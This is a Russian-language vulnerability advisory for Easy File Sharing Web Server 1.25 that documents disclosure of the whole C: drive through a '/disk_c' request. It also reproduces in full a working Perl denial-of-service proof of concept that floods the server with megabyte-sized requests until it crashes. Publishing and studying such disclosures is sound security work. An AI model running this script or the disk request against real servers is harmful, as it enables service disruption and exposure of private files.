Несколько уязвимостей в Easy File Sharing Web Server

Дата публикации:
26.08.2004
Всего просмотров:
1110
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2004-1743
CVE-2004-1744
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Раскрытие системных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Easy File Sharing Web Server 1.x
Уязвимые версии: Easy File Sharing Web Server 1.25

Описание: Несколько уязвимостей обнаружено в Easy File Sharing Web Server. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может также вызвать отказ в обслуживании.

Удаленный пользователь может представить специально обработанный запрос для виртуального имени директории для локального диска с:, чтобы просмотреть содержание всего диска. Пример:

http://[target]/disk_c
Также сообщается, что удаленный пользователь может представить несколько больших HTTP запросов, чтобы заставить систему использовать 100 CPU.

Пример/Эксплоит:


#!/usr/bin/perl
#####################################################
# Easy File Sharing Webserver v1.25 Denial Of Service
# Proof Of Concept Code By GulfTech Security Research
#####################################################
# Easy File Sharing Webserver v1.25 will consume 99%
# of CPU usage until it crashes when sent large req's
#####################################################

use IO::Socket;

print "=====================================================\n".
      " Easy File Sharing Webserver v1.25 Denial Of Service \n".
	  "=====================================================\n";

unless (@ARGV > 1) { die("usage: efswsdos.pl host port"); }

	my $remote_host = $ARGV[0];
	my $remote_port = $ARGV[1];
	my $done = "\015\012\015\012";
	my $buff = "A" x 1000000;
	my $requested = $buff.$done;

	print "[*] DoS'ing Server $remote_host Press ctrl+c to stop\n";

	while ($requested) {
	for (my $i=1; $i<10; $i++) {
	my $i = IO::Socket::INET->new( Proto => "tcp",
							       PeerAddr  => $remote_host,
								   PeerPort  => $remote_port,
							       Timeout   => '10000',
							       Type      => SOCK_STREAM,
							      ) || die("[*] The Server Has Been Killed!");

	print $i $requested;
	$i->autoflush(1);
   }
}
	close $remote;

URL производителя: http://www.sharing-file.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

или введите имя

CAPTCHA